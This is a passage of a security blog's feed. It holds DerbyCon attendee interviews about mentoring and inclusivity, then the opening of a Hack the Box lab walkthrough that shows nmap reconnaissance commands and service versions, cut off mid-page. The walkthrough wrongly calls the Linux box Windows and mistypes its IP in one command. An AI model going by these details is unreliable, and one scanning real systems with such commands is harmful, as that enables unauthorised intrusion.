image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!KfK0!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!KfK0!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 424w, https://substackcdn.com/image/fetch/$s_!KfK0!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 848w, https://substackcdn.com/image/fetch/$s_!KfK0!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!KfK0!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!KfK0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!KfK0!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 424w, https://substackcdn.com/image/fetch/$s_!KfK0!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 848w, https://substackcdn.com/image/fetch/$s_!KfK0!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!KfK0!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F86c3cc60-933d-473e-8ad8-72de50ae41e8_800x400.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>I sat down with <a href="https://medium.com/u/e3a43e3c8451">Nicole Schwartz</a> to talk about her involvement and memories of DerbyCon.</p><p>Nicole attended many years of DerbyCon, with DerbyCon 3 being her first. It is one conference that she has attended solely as an attendee. For the final DerbyCon, she was a speaker (more on that later in this article) and in previous years, she has helped with resume review.</p><p>Through her presentation, (embedded below) she provided security people ideas on how to use DevSecOps to their advantage. Her hope is that attendees leave with at least one new idea of how to do DevSecOps better &#8212; this might be ideas around tools (like GitLab), or programs (like growing agile advocates) or even just getting a plan ready for what would be a small tool or process to automate if engineering gets on board to help them reduce their risk.</p><p>When asked about community resources to share, Schwartz had no shortage of delights to share, even going as far as to preface the question with a question in terms of a limit. She is staff for <a href="https://www.dianainitiative.org/">The Diana Initiative</a>, staffed <a href="https://www.defcon.org/">Defcon</a> <a href="https://skytalks.info/">SkyTalks</a> for a few years. With <a href="https://twitter.com/mzbat">MzBat</a> and <a href="https://twitter.com/hacks4pancakes">Lesley Carhart</a>, she volunteers to help to coordinate the Career workshops at conferences and wants the community to know that the resume review and mock interview clinic format is open source and other people should do at events!</p><p>Schwartz tries and does hackerswan, hackerfoodies, and hackerconticketexchange herself. She has helped <a href="https://twitter.com/sylv3on_">sylv3on</a> do the ladies of Defcon meetup this past year and the WAN party discord, which, with others, she is trying to grow and improve a WAN party or WAN squad (to be more inclusive) meetup at Defcon for next year (Defcon 28). She plans to help with <a href="https://twitter.com/defconprom?lang=en">Defconprom</a>.</p><p>It is evident that Nicole loves mentoring for talks. The Diana Initiative implemented this in 2019, inspired by <a href="https://www.bsideslv.org/">BSides Las Vegas</a> Proving Ground. She helped run a scholarship drive to bring 9 students to The Diana Initiative and would like to improve and grow it for next year</p><p>Nicole maintains a project or two on advice for those hosting conferences to level up their inclusivity, tips, and tricks for doing CFPs, and advice for first-time speakers and conference-goers. I asked if there was anything else, her response, &#8220;and I am sure more, lol, but that's likely too much.&#8221; As a passion, she wants to try and grow the community and help so many other people.</p><p>Schwartz enjoyed DerbyCon for the friendly Hyatt staff (like Kelly, who notably received a DerbyCon Black Badge during the closing ceremony) and chose to stay at the Hyatt this year. She also points out that it was smaller (like <a href="https://www.shmoocon.org/">ShmooCon</a>) so seeing friends made it worth it. Finally it previously was an event that she could drive to which was great, and lastly, so many of my friends attend.</p><p>Her favorite memory, weirdly, <a href="https://twitter.com/ihackedwhat">Render</a> and Nicole fell in love at DerbyCon. They started at BSides Las Vegas 3 years back, continued the fling through Defcon, then she came to DerbyCon only to hang with him. The outcome? Well, now she&#8217;s moving to Canada!</p><p><em>The conversation has been edited and condensed for clarity.</em></p><p><em>This article is part of a series of articles about DerbyCon IX including interviews with speakers, organizers, and attendees.</em></p><h3>About Nicole:</h3><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!hnr4!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!hnr4!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 424w, https://substackcdn.com/image/fetch/$s_!hnr4!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 848w, https://substackcdn.com/image/fetch/$s_!hnr4!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!hnr4!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!hnr4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!hnr4!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 424w, https://substackcdn.com/image/fetch/$s_!hnr4!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 848w, https://substackcdn.com/image/fetch/$s_!hnr4!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!hnr4!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F89e491ba-9974-4560-8664-fb6c36574403_751x1001.jpeg 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>Nicole Schwartz (<a href="https://twitter.com/CircuitSwan">@CircuitSwan</a>) is a Product Manager for the GitLab Secure team. In her career, she has been in Product, System Administration, and Agile coaching. Before her career ever started she was a Hacker. When she isn&#8217;t working, she volunteers at and attends conventions (you may have known her as AmazonV) such as the Diana Initiative and groups like HackerSwan, HackerFoodies, and HackerConTicketExchange.</p><h3>Contacting Nicole:</h3><p><a href="https://twitter.com/CircuitSwan">Twitter</a></p>]]></content:encoded></item><item><title><![CDATA[DerbyCon Interview Series: The Blind Hacker, Joe B.]]></title><description><![CDATA[I sat down with The Blind Hacker, Joe B. to talk about his involvement and memories of DerbyCon.]]></description><link>https://tidbit.theosintion.com/p/derbycon-interview-series-the-blind-hacker-joe-b-453b7518fb7d</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/derbycon-interview-series-the-blind-hacker-joe-b-453b7518fb7d</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Thu, 12 Sep 2019 10:01:03 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!skSN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg" length="0" type="image/jpeg"/><content:encoded><![CDATA[<div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!skSN!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!skSN!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 424w, https://substackcdn.com/image/fetch/$s_!skSN!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 848w, https://substackcdn.com/image/fetch/$s_!skSN!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!skSN!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!skSN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/e8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!skSN!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 424w, https://substackcdn.com/image/fetch/$s_!skSN!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 848w, https://substackcdn.com/image/fetch/$s_!skSN!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 1272w, https://substackcdn.com/image/fetch/$s_!skSN!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fe8c05bdb-908a-49c5-8005-b365838fc893_800x400.jpeg 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p>I sat down with The Blind Hacker, Joe B. to talk about his involvement and memories of DerbyCon.</p><p>Joe attended every DerbyCon since DerbyCon 5 (2015). This year, he was a participant and Speaker at DerbyCon. In years past, he went to some talks but mostly villages and chatting, with some CTF action.</p><p>This year, he presented a &#8220;Stable Talk,&#8221; which is a 30 minutes presentation on its own dedicated track. His presentation was Stable Talk 21: <em>Hacking While Blind. </em>When asked what he hopes for people to take away from his talk, he said that he believes that people were able to see just because someone is blind or differently-abled they can still easily do this job, and we can do more to help be more inclusive.</p><p>Joe works on a plethora, but he is most proud of his discord community, <em>DeadPixelSec, </em>where they work on many projects, form Mentoring, CTF&#8217;s and community outreach.</p><p>Regarding his memories of DerbyCon, Joe says that he loved DerbyCon and what it was able to do for people, it was like a family reunion, Everyone was approachable and wanted to chat, could easily go to dinner with strangers and come back friends in just a few short days.</p><p><em>The conversation has been edited and condensed for clarity.</em></p><p><em>This article is part of a series of articles about DerbyCon IX including interviews with speakers, organizers, and attendees.</em></p><h3>About Joe:</h3><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Dy_k!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Dy_k!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 424w, https://substackcdn.com/image/fetch/$s_!Dy_k!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 848w, https://substackcdn.com/image/fetch/$s_!Dy_k!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 1272w, https://substackcdn.com/image/fetch/$s_!Dy_k!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Dy_k!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/fe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Dy_k!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 424w, https://substackcdn.com/image/fetch/$s_!Dy_k!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 848w, https://substackcdn.com/image/fetch/$s_!Dy_k!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 1272w, https://substackcdn.com/image/fetch/$s_!Dy_k!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Ffe83ca0c-70a1-4ac9-8f60-94680a7c548f_800x400.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p>A long-time hacker, info-sec enthusiast, Mentor. The Blind Hacker has volunteered to read over resumes and do mock interviews as well as mentor anyone who asks. As a person with a disability, he has never let it slow him down.</p><h3><strong>Contacting Joe:</strong></h3><p><a href="https://Twitter.com/theblindhacker">Twitter</a> <br><a href="http://twitch.tv/theblindhacker">Twitch</a><br><a href="http://discord.deadpixelsec.com">DeadPixelSec Discord</a></p>]]></content:encoded></item><item><title><![CDATA[HTB Retired Box Walkthrough: Mirai]]></title><description><![CDATA[Mirai is a retired Linux machine that is rated as Easy on Hack the Box.]]></description><link>https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-mirai-83b22174f03b</link><guid isPermaLink="false">https://tidbit.theosintion.com/p/htb-retired-box-walkthrough-mirai-83b22174f03b</guid><dc:creator><![CDATA[Joe Gray]]></dc:creator><pubDate>Tue, 10 Sep 2019 22:56:23 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!Ec_K!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Mirai is a retired Linux machine that is rated as Easy on Hack the Box.</p><blockquote><p><em>Hostname: Mirai<br>IP: 10.10.10.48<br>Operating System: Linux</em></p></blockquote><h3>Port Scan Results*</h3><p>A simple nmap port scan <em>nmap -vvvvv 10.10.10.48 yields the following ports:</em></p><blockquote><p><em>22/tcp: ssh<br>53/tcp: domain<br>80/tcp: http</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Ec_K!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Ec_K!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 424w, https://substackcdn.com/image/fetch/$s_!Ec_K!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 848w, https://substackcdn.com/image/fetch/$s_!Ec_K!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 1272w, https://substackcdn.com/image/fetch/$s_!Ec_K!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Ec_K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png" data-attrs="{&quot;src&quot;:&quot;https://bucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com/public/images/6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:null,&quot;width&quot;:null,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Ec_K!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 424w, https://substackcdn.com/image/fetch/$s_!Ec_K!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 848w, https://substackcdn.com/image/fetch/$s_!Ec_K!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 1272w, https://substackcdn.com/image/fetch/$s_!Ec_K!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2F6a59a525-eca5-4ca6-a140-c5336690682c_800x409.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><h3>Further Enumeration*</h3><p>Let&#8217;s go a little deeper with version numbers. We know it&#8217;s a Windows system and the name is a hint of sorts it seems. I use <em>nmap -vvvvv -A -sVT 10.10.10.4.</em></p><blockquote><p><em>22/tcp: OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)<br>53/tcp: dnsmaq 2.76<br>80/tcp: lighttp 1.4.35</em></p></blockquote><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!whBG!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!whBG!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 424w, https://substackcdn.com/image/fetch/$s_!whBG!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 848w, https://substackcdn.com/image/fetch/$s_!whBG!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 1272w, https://substackcdn.com/image/fetch/$s_!whBG!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fbucketeer-e05bbc84-baa3-437e-9518-adb32be77984.s3.amazonaws.com%2Fpublic%2Fimages%2Fbb419c26-7b09-4e23-bf79-28bf08f84acf_800x547.png 1456w" sizes="100vw"><img 